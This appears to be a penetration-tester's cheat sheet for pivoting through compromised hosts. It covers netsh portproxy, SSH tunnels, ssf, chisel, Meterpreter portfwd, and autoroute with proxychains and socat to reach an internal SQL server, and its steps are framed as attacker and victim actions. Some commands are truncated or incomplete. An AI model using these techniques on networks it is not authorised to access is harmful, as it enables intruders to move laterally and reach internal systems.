netsh advfirewall firewall add rule name="<rulename>" dir=in action=allow protocol=TCP localport=8080
netsh interface portproxy add v4tov4 listenport=8080 listenaddress= connectport=80 connectaddress=<addr>



./ssfd -p 8080


./ssf -L 9000: -p 8080
./ssf -R 9000: -p 8080


Static port forwarding (single port, execute on attacker)

ssh <user>@<target> -L<targetip>:<targetport>

Dynamic Port Forwarding (execute on attacker)

ssh -D <localport> user@host

Remote forwarding (execute on victim)

ssh -r -R <lport>:<ip>:<rport> user@attacker

Jump Host

ssh -J jumpuser1@jumphost1,jumpuser2@jumphost2,...,jumpuserN@jumphostN user@host


Forward Port 8089, listening on a localhost on the victim, out to the attacker:

victim> ./chisel server -p 5000
attacker> ./chisel client 8089


Remote Forward (opens 6443 on remote and forwards to local

portfwd add -R -p 6443 -l 443 -L

Note: Chaining multiple forwards often leads to Metasploit timeouts/crashes. In this case its best to just forward a single hop via metasploit and another technique for the next hop (e.g. default windows forwarding).


Get a session on a box that can reach the server, then run autoroute -s addr/subnet alternativly you can add these manually via route add addr/subnet <session> Start the socks4a proxy module. Now we can use socat to make the server locally available:

proxychains socat TCP4-Listen:1433,fork TCP:<>:1433

Now a windows machine in the same network can connect via windows authentication:

C:\Program Files (x86)\Microsoft SQL Server Management Studio 18\Common7\IDE>runas /netonly /user:<>\<> "Ssms.exe -S <local box>"

An alternative to autoroute is to use this syntax outside of any sessions:

route add <>/<> <session id>

Last updated